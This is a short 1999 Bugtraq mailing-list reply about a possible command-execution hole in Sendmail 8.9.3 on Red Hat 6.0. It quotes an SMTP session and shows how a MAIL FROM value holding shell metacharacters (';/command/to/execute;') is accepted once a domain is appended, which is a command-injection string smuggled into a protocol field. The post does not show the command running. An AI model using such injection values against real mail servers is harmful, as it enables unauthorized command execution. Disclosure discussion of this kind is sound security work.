[12199] in bugtraq
Re: RH6.0 local/remote command execution
daemon@ATHENA.MIT.EDU (drago@JUNKER.ORG)
Sat Oct 9 15:38:08 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9910081731560.4155-100000@Junker.org>
Date: Fri, 8 Oct 1999 17:33:05 -0400
Reply-To: D <drago@JUNKER.ORG>
From: D <drago@JUNKER.ORG>
X-To: Neezam Haniff <nhaniff@WWW.RCC.RYERSON.CA>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <199910061749.NAA01688@www.rcc.ryerson.ca>
On Wed, 6 Oct 1999, Neezam Haniff wrote:
NH> [nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
NH> Trying 127.0.0.1...
NH> Connected to localhost.
NH> Escape character is '^]'.
NH> 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400
NH> helo x.x
NH> 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
NH> MAIL FROM: ;/command/to/execute;
NH> 553 ;/command/to/execute;... Domain name required
Lets get creative then............
MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok
